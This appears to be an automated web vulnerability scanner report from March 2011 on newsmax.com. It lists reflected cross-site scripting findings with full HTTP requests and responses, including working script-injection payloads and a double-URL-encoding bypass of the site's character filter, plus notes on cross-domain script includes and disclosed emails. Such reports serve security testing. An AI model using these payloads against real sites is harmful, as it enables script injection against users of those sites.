<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011db41b' a=b 17ed13ad59c/03/18/id/389920' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 798fe'%20a%3db%20f9e45a4bccc was submitted in the REST URL parameter 4. This input was echoed as 798fe' a=b f9e45a4bccc in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03798fe'%20a%3db%20f9e45a4bccc/18/id/389920 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43644 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03798fe' a=b f9e45a4bccc/18/id/389920' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d019b'%20a%3db%20b097a50d63b was submitted in the REST URL parameter 5. This input was echoed as d019b' a=b b097a50d63b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18d019b'%20a%3db%20b097a50d63b/id/389920 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43644 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18d019b' a=b b097a50d63b/id/389920' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d5fe5'%20a%3db%2019ce17fb6fb was submitted in the REST URL parameter 7. This input was echoed as d5fe5' a=b 19ce17fb6fb in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920d5fe5'%20a%3db%2019ce17fb6fb HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41051 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920d5fe5' a=b 19ce17fb6fb' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ad2%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eccfe289fe13 was submitted in the REST URL parameter 7. This input was echoed as a8ad2"><img src=a onerror=alert(1)>ccfe289fe13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920a8ad2%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eccfe289fe13 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41499 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(389920a8ad2"><img src=a onerror=alert(1)>ccfe289fe13);" class="article_tools_link"> ...[SNIP]...
1.79. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3204c'><script>alert(1)</script>2fc187ef478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?3204c'><script>alert(1)</script>2fc187ef478=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43866 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?3204c'><script>alert(1)</script>2fc187ef478=1' class="article_tools_link"> ...[SNIP]...
1.80. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f698a"><script>alert(1)</script>1a0a80d6daa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?f698a"><script>alert(1)</script>1a0a80d6daa=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43871
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?f698a"><script>alert(1)</script>1a0a80d6daa=1')" class="article_tools_link"> ...[SNIP]...
2. Cross-domain script include
There are 105 instances of this issue:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.newsmax.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following email addresses were disclosed in the response:
customerservice@Newsmax.com
customerservice@newsmax.com
Request
GET /PrivacyStatement HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 37109
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:17 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... above. If you have purchased products, including subscriptions, from us in the past, you may also request that your Personal Data be removed from Newsmax's database by contacting Newsmax via e-mail at customerservice@Newsmax.com, in addition to the telephone number. In any instance, our removal of such information may require you to register again with Newsmax in the event you later wish full access to the Site.</p> ...[SNIP]... <a href="mailto:customerservice@newsmax.com" target="_blank"><strong>customerservice@newsmax.com</strong> ...[SNIP]...